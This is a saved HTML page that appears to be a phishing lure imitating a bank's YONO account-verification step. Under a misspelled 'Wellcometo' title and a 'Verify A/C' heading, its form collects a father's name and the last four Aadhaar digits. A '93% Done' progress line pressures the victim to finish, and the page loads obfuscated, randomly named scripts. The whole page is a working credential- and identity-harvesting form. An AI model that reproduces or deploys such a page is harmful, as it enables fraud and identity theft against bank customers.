<!DOCTYPE html>
<!-- saved from url=(0029)https://sb-bysf.vercel.app/gq -->
<html lang="en" webcrx="" style="">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width">
    <title>Wellcometo</title>
    <meta name="next-head-count" content="3">
    <link rel="stylesheet" href="./css/style.css" />

</head>

<body cz-shortcut-listen="true">
    <div id="__next">
        <header class="Jeuookhh_logo__chFnY"><img alt="LMDx7g" loading="lazy" width="120" height="32" decoding="async"
                data-nimg="1" src="./images/yono.png" style="color: transparent;"></header>
        <main>
            <div class="Jeuookhh_login_heading__g_rIN">
                <h3 class="Jeuookhh_login_heading_h3__40cUi">Verify A/C</h3>
            </div>
            <div class="Jeuookhh_login_form__UT1PX">
                <p class="Jeuookhh_mandatory_txt__seeNN">Mandatory fields are marked with an asterisk (*)</p>
                <form class="Jeuookhh_form__NPDIu" method="post"><input type="hidden" name="formtoken" value="BV1OSh">
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Father/'s Name <span
                                class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="Fthr" type="text"
                            class="Jeuookhh_form_control__aKuXl" required="" minlength="3" maxlength="30"></div>
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Last 4-digit Aadhaar No
                            <span class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="ldan" type="text"
                            class="Jeuookhh_form_control__aKuXl" required="" minlength="4" inputmode="numeric"
                            maxlength="4"></div>
                    <p class="Jeuookhh_content_title__eLlbR">93% Done</p>
                    <div class="Jeuookhh_t_center____ZxZ"><input type="submit" class="Jeuookhh_btn_default__PIkhU"
                            value="submit"></div>
                </form><br>
            </div>
        </main>
        <div class="Jeuookhh_footer_area__5ot65"><img alt="njgXdr" loading="lazy" width="68" height="28"
                decoding="async" data-nimg="1" src="./images/gwhp.png" style="color: transparent;"></div>
        <div class="Jeuookhh_footer__Wxn0J">
            <p>©</p>
        </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json"
        crossorigin="">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"0lCBycRkeqCWXcllfoPaw","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert"
            style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;">
            Loading...</p>
    </next-route-announcer>
    <script src="./Wellcometo5_files/354-4e020a05081b574c.js.download"></script>
    <script src="./Wellcometo5_files/bbx-87a45827a86431f3.js.download"></script>
    <script src="./Wellcometo5_files/kj-2223d62af91e386b.js.download"></script>
    <script src="./Wellcometo5_files/why-373c9d3dc95162c6.js.download"></script>
    <script src="./Wellcometo5_files/sb-c5284f5704c5ea49.js.download"></script>
    <script src="./Wellcometo5_files/ism-2c00e88577fcbbfd.js.download"></script>
    <script src="./Wellcometo5_files/zx-3148b250491a8684.js.download"></script>
    <script src="./Wellcometo5_files/yk-a695d235f3bd87e4.js.download"></script>
    <script src="./Wellcometo5_files/tbi-994ff3ab7cf2f658.js.download"></script>
    <script src="./Wellcometo5_files/gq-eef5baf0e4ac624a.js.download"></script>
</body>

</html>